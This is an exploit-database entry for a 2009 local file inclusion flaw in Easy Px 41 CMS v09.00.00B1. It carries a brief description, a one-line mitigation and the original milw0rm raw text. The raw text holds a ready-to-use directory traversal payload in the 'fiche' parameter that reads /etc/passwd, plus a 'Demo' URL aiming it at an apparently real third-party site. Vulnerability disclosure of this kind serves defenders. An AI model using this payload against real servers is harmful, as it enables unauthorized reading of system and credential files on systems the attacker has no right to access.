header-logo
Suggest Exploit
vendor:
Easy Px 41 CMS
by:
ThE g0bL!N
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: Easy Px 41 CMS
Affected Version From: 09.00.00B1
Affected Version To: 09.00.00B1
Patch Exists: NO
Related CWE: N/A
CPE: a:easy-script:easy_px_41_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Easy Px 41 CMS v09.00.00B1 (fiche) Local File Include Exploit

This exploit allows an attacker to include a local file on the server, such as the /etc/passwd file. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable server, containing the path to the local file in the 'fiche' parameter. The exploit is successful if the server responds with the contents of the local file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in a file operation.
Source

Exploit-DB raw data:

# Easy Px 41 CMS v09.00.00B1 (fiche) Local File Include Exploit
# D.Script: http://www.easy-script.com/scripts-dl/EPX41v9.zip
# Discovered by: ThE g0bL!N
# Greetz To: ALL My Friend (dz)
# Exploit: /[path]/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00
# Demo :http://www.epx41.be/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00

# milw0rm.com [2009-05-27]

Navigation

Suggest Exploit

Services By CQR